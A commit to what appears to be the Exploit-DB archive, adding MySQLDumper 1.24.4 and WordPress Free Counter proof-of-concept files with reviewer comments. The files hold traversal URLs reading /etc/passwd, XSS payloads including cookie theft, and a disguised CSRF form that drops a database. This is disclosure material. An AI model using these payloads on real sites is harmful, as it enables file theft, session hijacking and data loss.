DB: 2015-05-28

9 new exploits
Offensive Security 2015-05-28 05:02:44 +00:00
parent 8a28155962
commit c2a15a0750
11 changed files with 184 additions and 6 deletions


@ -78,7 +78,7 @@ id,file,description,date,author,platform,type,port
77,platforms/hardware/remote/77.c,"Cisco IOS 12.x/11.x HTTP Remote Integer Overflow Exploit",2003-08-10,FX,hardware,remote,80
78,platforms/linux/remote/78.c,"wu-ftpd 2.6.2 - Remote Root Exploit (advanced version)",2003-08-11,Xpl017Elz,linux,remote,21
79,platforms/windows/local/79.c,"DameWare Mini Remote Control Server SYSTEM Exploit",2003-08-13,ash,windows,local,0
80,platforms/windows/remote/80.c,"Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit",2003-08-13,"David Litchfield",windows,remote,2100
80,platforms/windows/remote/80.c,"Oracle XDB FTP Service - UNLOCK Buffer Overflow Exploit",2003-08-13,"David Litchfield",windows,remote,2100
81,platforms/windows/remote/81.c,"Microsoft Windows 2000 - RSVP Server Authority Hijacking PoC Exploit",2003-08-15,"ste jones",windows,remote,0
82,platforms/windows/dos/82.c,"Piolet Client 1.05 - Remote Denial of Service Exploit",2003-08-20,"Luca Ercoli",windows,dos,0
83,platforms/windows/remote/83.html,"Microsoft Internet Explorer Object Data Remote Exploit (M03-032)",2003-08-21,malware,windows,remote,0
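Review bot: the only change in this hunk is the description of entry 80 gaining the " - " separator ("Oracle XDB FTP Service - UNLOCK Buffer Overflow Exploit"), which matches the style of entry 78 in the same hunk; the rendering dropped the +/- markers, so both the old and the new row are shown. The same entry's file, 80.c, is also touched at the end of this commit, and neither change is mentioned in the commit message, which only announces new exploits; a one-line "retitle/whitespace fix for 80" in the message would make the pairing obvious.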
@ -13780,7 +13780,7 @@ id,file,description,date,author,platform,type,port
15915,platforms/php/webapps/15915.py,"Concrete CMS 5.4.1.1 - XSS/Remote Code Execution Exploit",2011-01-05,mr_me,php,webapps,0
15868,platforms/windows/remote/15868.pl,"QuickPHP Web Server Arbitrary - (src .php) File Download",2010-12-30,"Yakir Wizman",windows,remote,0
15869,platforms/windows/remote/15869.txt,"CA ARCserve D2D r15 - Web Service Servlet Code Execution",2010-12-30,rgod,windows,remote,0
15879,platforms/windows/shellcode/15879.txt,w32-speaking-shellcode,2010-12-31,Skylined,windows,shellcode,0
15879,platforms/windows/shellcode/15879.txt,"w32 speaking shellcode",2010-12-31,Skylined,windows,shellcode,0
15885,platforms/windows/remote/15885.html,"HP Photo Creative 2.x audio.Record.1 - ActiveX Control Remote Stack Based Buffer Overflow",2011-01-01,rgod,windows,remote,0
15886,platforms/php/webapps/15886.txt,"KLINK SQL Injection Vulnerability",2011-01-01,"Mauro Rossi and Andres Gomez",php,webapps,0
15895,platforms/windows/local/15895.py,"CoolPlayer 2.18 - DEP Bypass",2011-01-02,blake,windows,local,0
@ -26885,7 +26885,7 @@ id,file,description,date,author,platform,type,port
30162,platforms/php/webapps/30162.txt,"WMSCMS 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-07,"Glafkos Charalambous ",php,webapps,0
30163,platforms/multiple/dos/30163.html,"Blue Coat Systems K9 Web Protection 32.36 - Remote Buffer Overflow Vulnerability",2007-06-08,"Dennis Rand",multiple,dos,0
30164,platforms/hardware/remote/30164.txt,"3Com OfficeConnect Secure Router 1.04-168 Tk Parameter Cross-Site Scripting Vulnerability",2007-06-08,"Secunia Research",hardware,remote,0
30165,platforms/asp/webapps/30165.txt,Ibrahim,2007-06-08,ertuqrul,asp,webapps,0
30165,platforms/asp/webapps/30165.txt,"Ibrahim Ã?AKICI Okul Portal Haber_Oku.ASP - SQL Injection Vulnerability",2007-06-08,ertuqrul,asp,webapps,0
30166,platforms/php/webapps/30166.txt,"WordPress 2.2 Request_URI Parameter Cross-Site Scripting Vulnerability",2007-06-08,zamolx3,php,webapps,0
30167,platforms/hardware/dos/30167.txt,"Packeteer PacketShaper 7.x Web Interface Remote Denial of Service Vulnerability",2007-06-08,nnposter,hardware,dos,0
30168,platforms/php/webapps/30168.txt,"vBSupport 2.0.0 Integrated Ticket System vBSupport.PHP SQL Injection Vulnerability",2007-06-09,rUnViRuS,php,webapps,0
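Review bot: the replacement row for 30165 still carries a mis-encoded character in the author's name ("Ibrahim Ã?AKICI"), so the row is only half repaired. The old row was broken in a worse way (the description had collapsed to the bare word "Ibrahim", leaving the line with too few fields), but the new one should be stored as clean UTF-8 so that every field parses and displays consistently with the surrounding rows. Suggest re-exporting the description from the original advisory title rather than from the double-encoded copy.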
@ -33504,3 +33504,12 @@ id,file,description,date,author,platform,type,port
37122,platforms/php/webapps/37122.txt,"Shawn Bradley PHP Volunteer Management 1.0.2 'id' Parameter SQL Injection Vulnerability",2012-04-28,eidelweiss,php,webapps,0
37123,platforms/php/webapps/37123.txt,"WordPress WPsc MijnPress Plugin 'rwflush' Parameter Cross Site Scripting Vulnerability",2012-04-30,Am!r,php,webapps,0
37124,platforms/windows/dos/37124.txt,"Acoustica Pianissimo 1.0 Build 12 (Registration ID) Buffer Overflow PoC",2015-05-26,LiquidWorm,windows,dos,0
37125,platforms/php/webapps/37125.txt,"MySQLDumper 1.24.4 restore.php filename Parameter XSS",2012-04-27,AkaStep,php,webapps,0
37126,platforms/perl/webapps/37126.txt,"MySQLDumper 1.24.4 install.php language Parameter Traversal Arbitrary File Access",2012-04-27,AkaStep,perl,webapps,0
37127,platforms/php/webapps/37127.txt,"MySQLDumper 1.24.4 install.php Multiple Parameter XSS",2012-04-27,AkaStep,php,webapps,0
37128,platforms/php/webapps/37128.txt,"MySQLDumper 1.24.4 sql.php Multiple Parameter XSS",2012-04-27,AkaStep,php,webapps,0
37129,platforms/php/webapps/37129.txt,"MySQLDumper 1.24.4 filemanagement.php f Parameter Traversal Arbitrary File Access",2012-04-27,AkaStep,php,webapps,0
37130,platforms/php/webapps/37130.txt,"MySQLDumper 1.24.4 Multiple Script Direct Request Information Disclosure",2012-04-27,AkaStep,php,webapps,0
37131,platforms/php/webapps/37131.txt,"MySQLDumper 1.24.4 main.php Multiple Function CSRF",2012-04-27,AkaStep,php,webapps,0
37132,platforms/php/webapps/37132.txt,"WordPress Plugin Free Counter 1.1 Stored XSS",2015-05-27,"Panagiotis Vagenas",php,webapps,80
37133,platforms/php/webapps/37133.txt,"MySQLDumper 1.24.4 index.php page Parameter XSS",2012-04-27,AkaStep,php,webapps,0
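Review bot: entry 37126 is inconsistent with the other eight MySQLDumper rows in this hunk: its platform column is perl and its path is platforms/perl/webapps/37126.txt, although the advisory concerns install.php of a PHP application and every sibling row (37125, 37127 through 37131, 37133) uses php and platforms/php/webapps/. The port column is also uneven: 37132 has 80 while every other webapps row, including the 37125 row added in the same hunk, has 0. Both look like data-entry slips; suggest moving 37126 under php and settling on one port convention for webapps rows.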


@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/53306/info
MySQLDumper is prone to multiple security vulnerabilities, including:
1. Multiple cross-site scripting vulnerabilities.
2. A local file-include vulnerability.
3. Multiple cross-site request-forgery vulnerabilities.
4. Multiple information-disclosure vulnerabilities.
5. A directory-traversal vulnerability.
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
http://www.example.com/learn/cubemail/install.php?language=../../../../../../../../../../../../../../../../../etc/passwd%00
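Review bot: the file never says which of the five listed issues the single URL demonstrates; a reader has to cross-check the CSV row ("install.php language Parameter Traversal Arbitrary File Access") to learn that this is item 5 via the language parameter, so a one-line label above the URL would help. It is also worth recording that the trailing %00 depends on null-byte path truncation, which PHP has rejected in filesystem and include paths since 5.3.4, so the request will not reproduce on a current interpreter even where the application itself is unpatched.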

platforms/php/webapps/37125.txt Executable file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/53306/info
MySQLDumper is prone to multiple security vulnerabilities, including:
1. Multiple cross-site scripting vulnerabilities.
2. A local file-include vulnerability.
3. Multiple cross-site request-forgery vulnerabilities.
4. Multiple information-disclosure vulnerabilities.
5. A directory-traversal vulnerability.
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
http://www.example.com/learn/cubemail/restore.php?filename=%3Cscript%3Ealert%281%29;%3C/script%3E
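Review bot: this file repeats the entire BID 53306 boilerplate verbatim and differs from the traversal file only in its last line, so the actual finding (restore.php, filename parameter, reflected into page markup per the CSV title) is again unlabeled. Since all nine MySQLDumper files in this commit follow the same pattern, consider trimming the shared text to the source line and giving each file a heading that names the script and the parameter; that is what a reader or a detection rule actually needs from the entry.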

platforms/php/webapps/37127.txt Executable file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/53306/info
MySQLDumper is prone to multiple security vulnerabilities, including:
1. Multiple cross-site scripting vulnerabilities.
2. A local file-include vulnerability.
3. Multiple cross-site request-forgery vulnerabilities.
4. Multiple information-disclosure vulnerabilities.
5. A directory-traversal vulnerability.
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
http://www.example.com/learn/cubemail/install.php?phase=8%3Cscript%3Ealert%281%29;%3C/script%3E&language=en&submit=Installation
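Review bot: the CSV title for 37127 says "install.php Multiple Parameter XSS" but this file demonstrates only one parameter (phase); either the title overstates the finding or the other affected parameters were dropped when the entry was split out of the BID, so either list them here or narrow the title. Note also that this URL and the 37126 one both hit install.php, which on a deployed instance should not be reachable once setup is complete; saying so gives the file a concrete mitigation alongside the PoC.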

platforms/php/webapps/37128.txt Executable file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/53306/info
MySQLDumper is prone to multiple security vulnerabilities, including:
1. Multiple cross-site scripting vulnerabilities.
2. A local file-include vulnerability.
3. Multiple cross-site request-forgery vulnerabilities.
4. Multiple information-disclosure vulnerabilities.
5. A directory-traversal vulnerability.
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
http://www.example.com/learn/cubemail/sql.php?db=0&dbid=1&tablename=%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.example.com/learn/cubemail/sql.php?db=0&dbid=%3Cscript%3Ealert%281%29;%3C/script%3E&tablename=1

platforms/php/webapps/37129.txt Executable file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/53306/info
MySQLDumper is prone to multiple security vulnerabilities, including:
1. Multiple cross-site scripting vulnerabilities.
2. A local file-include vulnerability.
3. Multiple cross-site request-forgery vulnerabilities.
4. Multiple information-disclosure vulnerabilities.
5. A directory-traversal vulnerability.
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
http://www.example.com/learn/cubemail/filemanagement.php?action=dl&f=../../config.php
http://www.example.com/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00
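Review bot: the two URLs demonstrate two different things and the file should say so: the first (f=../../config.php) stays inside the application tree and fetches the application's own configuration through action=dl, while the second appends %00 to reach /etc/passwd outside the web root. The BID text lists both a local file include (item 2) and a directory traversal (item 5), and the CSV row calls this "Traversal Arbitrary File Access"; stating whether action=dl returns the file bytes or includes them would settle which item this file belongs to, and the %00 variant carries the same PHP 5.3.4 caveat as the install.php one.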

platforms/php/webapps/37130.txt Executable file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/53306/info
MySQLDumper is prone to multiple security vulnerabilities, including:
1. Multiple cross-site scripting vulnerabilities.
2. A local file-include vulnerability.
3. Multiple cross-site request-forgery vulnerabilities.
4. Multiple information-disclosure vulnerabilities.
5. A directory-traversal vulnerability.
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
http://www.example.com/learn/cubemail/restore.php
http://www.example.com/learn/cubemail/dump.php
http://www.example.com/learn/cubemail/refresh_dblist.php
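Review bot: three bare URLs with no indication of what each direct request discloses; the CSV row ("Multiple Script Direct Request Information Disclosure") is the only clue. To verify the finding, or to write a detection signature for it, the expected response characteristic has to be recorded, so suggest one line per script describing the observed output that distinguishes a vulnerable instance from a patched one.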

platforms/php/webapps/37131.txt Executable file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/53306/info
MySQLDumper is prone to multiple security vulnerabilities, including:
1. Multiple cross-site scripting vulnerabilities.
2. A local file-include vulnerability.
3. Multiple cross-site request-forgery vulnerabilities.
4. Multiple information-disclosure vulnerabilities.
5. A directory-traversal vulnerability.
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
<img src="http://www.example.com/tld/meonyourpc.PNG" heigth="250" width="300" />
<form name="hackit" id="hackit" action="http://www.example.com/learn/cubemail/main.php?action=db&dbid=1" method="post">
<p><blink>Hotlink Protection is Active! Please click refresh button.</blink></p>
<input name="kill1" value="Refresh" onclick="alert('Congrats!) Your Database Dropped!')" type="submit">
</form>
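Review bot: the PoC HTML has a typo in the <img> tag, heigth="250", which browsers ignore but which should read height. The form itself shows the problem clearly: main.php?action=db&dbid=1 accepts a POST whose only field is the submit button kill1=Refresh, with nothing tying the request to the victim's session, which is the definition of the CSRF listed as item 3. Suggest a comment stating that kill1 is the destructive action, since that is otherwise visible only in the alert text, and note that the application-side fix is a per-session token checked before acting on kill1.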

platforms/php/webapps/37132.txt Executable file

@ -0,0 +1,41 @@
# Exploit Title: WordPress Free Counter Plugin [Stored XSS]
# Date: 2015/05/25
# Exploit Author: Panagiotis Vagenas
# Contact: https://twitter.com/panVagenas
# Vendor Homepage: http://www.free-counter.org
# Software Link: https://wordpress.org/plugins/free-counter/
# Version: 1.1
# Tested on: WordPress 4.2.2
# Category: webapps
# CVE: CVE-2015-4084
1. Description
Any authenticated or non-authenticated user can perform a stored XSS
attack simply by exploiting wp_ajax_nopriv_check_stat action.
Plugin uses a widget to display website's visits, so any page that
contains this widget will also load the malicious JS code.
2. Proof of Concept
* Send a post request to `http://www.free-counter.org/Api.php` in order
to reveal the counter id of the vulnerable site. The POST data must
contain the following vars:
`action=create_new_counter&site_url=http%3A%2f%my.vulnerable.website.com`
* As a response we get a serialized indexed array. The value that we
need to know is the 'counter_id'.
* Send a post request to
`http://my.vulnerable.website.com/wp-admin/admin-ajax.php` with data:
`action=check_stat&id_counter=<counter_id from step
2>&value_=<script>alert(1)</script>`
* Visit a page of the infected website that displays plugin's widget.
Note that the plugin uses the update_option function to store the
$_POST['value_'] contents to DB so any code inserted there will be
escaped. Even though a malicious user can omit the quotes in the src
attr of the script tag. Most modern browsers will treat the tag as they
were there.
3. Solution
No official solution yet exists.
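Review bot: the first PoC step's URL encoding is malformed: `site_url=http%3A%2f%my.vulnerable.website.com` has `%2f%` where `%2F%2F` is required, and `%my` is not a valid percent-escape, so the request will be rejected or mis-decoded as written. The third bullet refers to "counter_id from step 2" but the steps are unnumbered bullets; numbering them would remove the ambiguity. Section 3 could also name the fix the description already implies: the handler is registered on wp_ajax_nopriv_check_stat, so unauthenticated requests reach it, and the stored value_ is echoed by the widget, so the plugin needs a nonce or capability check on the AJAX handler plus output escaping (esc_html or equivalent) when the widget renders the stored value.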

platforms/php/webapps/37133.txt Executable file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/53306/info
MySQLDumper is prone to multiple security vulnerabilities, including:
1. Multiple cross-site scripting vulnerabilities.
2. A local file-include vulnerability.
3. Multiple cross-site request-forgery vulnerabilities.
4. Multiple information-disclosure vulnerabilities.
5. A directory-traversal vulnerability.
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
http://www.example.com/learn/cubemail/index.php?page=javascript:alert%28document.cookie%29;
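Review bot: this payload is a javascript: URI rather than a reflected tag, which means the page parameter of index.php lands in a link or redirect target rather than in page text; the CSV title just says "index.php page Parameter XSS", so the file should state that this is a URL-context injection, because the mitigation differs (validate that page is a known page name or relative path rather than merely HTML-escaping it on output).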


@ -194,6 +194,6 @@ snd=send(sock, exploit_code, strlen(exploit_code) , 0);
Sleep(2000);
closesocket(sock);
return 0;
}
// milw0rm.com [2003-08-13]
}
// milw0rm.com [2003-08-13]
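Review bot: the old and new sides of this hunk are identical in content (the closing brace and the milw0rm.com comment), so this is a whitespace-only change, most likely line endings or trailing whitespace, which the rendering cannot display. It coincides with the retitling of entry 80 in files.csv and is not mentioned in the commit message, which only announces 9 new exploits; a one-line mention of the 80.c touch-up would spare the next reader the puzzle.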